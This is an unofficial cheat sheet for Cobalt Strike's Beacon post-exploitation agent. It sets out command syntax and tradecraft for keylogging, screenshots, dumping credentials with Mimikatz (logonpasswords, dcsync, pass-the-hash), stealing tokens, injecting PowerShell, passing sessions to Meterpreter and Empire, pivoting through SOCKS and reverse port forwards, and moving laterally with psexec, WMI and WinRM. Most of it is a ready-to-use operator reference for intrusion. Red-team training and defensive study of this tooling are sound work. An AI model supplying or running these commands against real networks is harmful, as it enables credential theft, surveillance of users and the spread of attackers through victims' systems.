# **Beacon Cheat Sheet**



#### Introduction

Beacon is Cobalt Strike's flexible asynchronous payload that incorporates a number of post-exploitation options.

Once a Beacon is active, various contextual options are available by right clicking a Beacon in the display menu.

**Note:** this cheat sheet is not officially licensed/endorsed by Cobalt Strike nor its author (<u>@armitagehacker</u>). Official documentation for Beacon is available from the author at <a href="https://www.cobaltstrike.com/help-beacon">https://www.cobaltstrike.com/help-beacon</a>

#### Listeners

Cobalt Strike Beacon listeners are accessible through the "Cobalt Strike"->"Listeners" menu in the upper left.

When adding a new listener, the payload format follows <OS>/<agent\_mode>/<stager>. The <agent\_mode> determines what transport the agent will communicate over, while <stager> determines how the agent code is transferred to the target.

SMB Beacons use named pipes to communicate through a parent Beacon pivot. To setup a SMB listener, select the **windows/beacon\_smb/bind\_pipe** payload. The chosen port is used differently depending on exactly how the SMB Beacon is being used.

While using the SMB listener, any actions that affect the local host (i.e. bypassuac) will open up a TCP listener on the selected port that's bound to local host.

If the SMB listener is being used for lateral movement, the selected port affects the named pipe name used.

## **Common Commands**

The **beacon>** shell exposes a number of commands.

Display all available	help <command/>
commands or the help for a	
specified command	

ps
shell [command] [arguments]
sleep [seconds] <jitter 0-99=""></jitter>
jobs
jobkill [job ID]
clear
exit
link/unlink [IP address]

If you get an error 5 (access denied) when linking, use shell net use \\<IP>\IPC\$ /U:DOMAIN\user password to establish a session with the remote host first. The credentials can be any valid domain account.

Beacon also has a number of common file system navigation/interaction commands:

Display the current working directory for the Beacon session.	pwd
List the files on the specified path or the current folder.	Is <c:\path></c:\path>
Change into the specified working directory.	cd [directory]
Delete a file\folder.	rm [file\folder]
Download a file from the path on the Beacon host. These files must be synced from the teamserver to your CS instance later.	download [C:\filePath]
Lists downloads in progress	downloads
Cancel a download currently in progress, wildcards accepted.	cancel [*file*]
Upload a file from the attacker machine to the current Beacon working directory	upload [/path/to/file]

## Host and Network Recon

Beacon contains the standard post-exploitation actions you would expect from a mature agent.

**bypassuac [listener]** will execute a BypassUAC attack (if possible) to spawn a new agent in high integrity process. *Note that a DLL is dropped to disk to execute this.* 

**keylogger** [pid] <x86 | x64> injects a keystroke logger into the given process ID and architecture. The keylogger will return results on each agent check-in and will run indefinitely. Use **jobs** to list and **jobkill** <**ID**> to terminate.

screenshot [pid] <x86|x64> [runtime in seconds] injects a screen capture stub into the specified process/architecture for the specified number of seconds. Use jobs to list and jobkill <ID> to terminate.

Note that both keylogger and screenshot can be used through the process list pane from right clicking a Beacon and choosing "Explore" -> "Process List".

Beacon also has a number of net commands implemented that don't rely on calling net.exe. This includes session/share/localgroup/etc. enumeration of local or remote hosts. Use **help net** to see all commands and **help net [command]** for more information on a specific command.

## Mimikatz

The format to execute a Mimikatz (tab-completable) command is mimikatz [module::command] <args>. Using !module:: will cause Mimikatz to elevate to SYSTEM before execution, while @module:: will force the usage of Beacon's current token.

## logonpasswords will execute the

sekurlsa::logonpasswords module which extracts hashes and plaintext passwords out of LSASS. Credentials are stored in Cobalt Strike's persistent credential store.

dcsync [DOMAIN.fqdn] [DOMAIN\user] will use Isadump::dcync to extract the hash for the specified user from a domain controller, assuming the necessary privileges are present.

**pth [DOMAIN\user] [NTLM hash]** will use sekurlsa::pth to inject a user's hash into LSASS, starts a hidden process with those credentials, and impersonates that process. *Note that this requires local admin privileges*.

Credentials and Kerberos		
Elevate to SYSTEM.	getsystem	
Inject a Kerberos ticket into the current session.	kerberos_ticket_use [/path/ticket.kirbi]	
Purge Kerberos tickets.	kerberos_ticket_purge	
Set the current token to pass the specified domain credentials when interacting with network resources.	make_token [DOMAIN\user] [password]	
Steal a token from the specified process.	steal_token [PID]	
Revert to Beacon's original access token.	rev2self	

## PowerShell

Beacon's PowerShell integration allows you to easily run any post-ex PowerShell you would like.

powershell-import [/path/to/script.ps1] will import a PowerShell .ps1 script from the control server and save it in memory in Beacon. The functions from the imported script are exposed to the commands below. Only one PowerShell script can be contained in memory at a time.

**powershell [commandlet] [arguments]** will first setup a local TCP server bound to localhost and download the script imported from above using powershell.exe. Then the specified function and any arguments are executed and output is returned.

**powerpick [commandlet] [arguments]** will launch the given function using @tifkin\_'s Unmanaged PowerShell which doesn't start powershell.exe.

psinject [pid] [arch] [commandlet] [arguments] will inject Unmanaged PowerShell into a specific process and execute the specified command. This is useful for long-running PowerShell jobs.

## **Session Passing**

There are a number of ways to spawn new Beacons and pass sessions to other teamservers.

Inject a new Beacon into the specified process, spawned to the given listener.	inject [pid] <x86 x64> [listener]</x86 x64>
Set the program that's spawned for spawn/spawnas. The default is rundll32.exe.	spawnto [C:\path\prog.exe]
Spawn a new Beacon process to the given listener.	spawn [listener]
Spawn a new Beacon to the specified listener as another user.	spawnas [DOMAIN\user] [password] [listener]

Note that spawnas will often fail when running as SYSTEM, in this case use **make\_token** instead. Also ensure that you're in a directory the new user has read access to.

To spawn a new Meterpreter session, set the listener type to be windows/foreign/reverse\_http[s] and input the Meterpreter listener configuration. Then use this listener with any of the above commands.

To spawn a new agent to Empire, either generate an Empire DLL and use dllinject [PID] [/path/empire.dll] or generate a non-base64 encoded Empire stager, save to a .ps1 file inside of a function block, use powershell-import [stager.ps1], and then powershell [Function].

## Pivoting

There are a few pivoting options available in Beacon.

After any of the following pivots are started, they can be viewed through "View"->"Proxy Pivots" and stopped as desired.

**socks [PORT]** will start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.

browserpivot [pid] [x86|x64] will proxy browser traffic through a specified Internet Explorer process. Right clicking a Beacon and choosing "Explore"->"Browser Pivot" will automatically enumerate available IE processes. Use proxychains or set a native browser's proxy settings to use the functionality.

**rportfwd [bind port] [forward host] [forward port]** will bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port. This is useful for tunneling out traffic out of a network in specific situations.

## Lateral Movement

Beacon's lateral movement options cover all the standard bases and integrate smoothly with listeners. All three of the following commands ultimately launch powershell.exe on the remote host to inject stager shellcode, so keep this in mind!

**psexec\_psh [host] [listener]** creates a service on the target to launch the stager which will operate as SYSTEM.

wmi [host] [listener] uses WMI's process call create to launch the stager on the remote system.

winrm [host] [listener] uses Windows remoting to spawn the given stager.

Note that stagers spawned through wmi/winrm will operate under the user context used on the attacker machine to spawn them, but only they are a network logon. This means that the token is only good for the target machine and cannot be reused on the network. Use **make\_token** after spawning a stager in this way to ensure fresh credentials.

# **Tradecraft Tips**

Use make\_token after spreading with wmi.

Use SMB pivots for internal spread after an initial foothold with 2-3 outbound HTTP[S]/DNS channels.

You can relink to your SMB "mesh" if an external outbound channel dies and you will regain control.

Malleable C2 (https://www.cobaltstrike.com/help-malleable-c2) lets you modify your traffic patterns.

## More Information

https://www.cobaltstrike.com/help-beacon

https://www.cobaltstrike.com/training

#armitage on Freenode IRC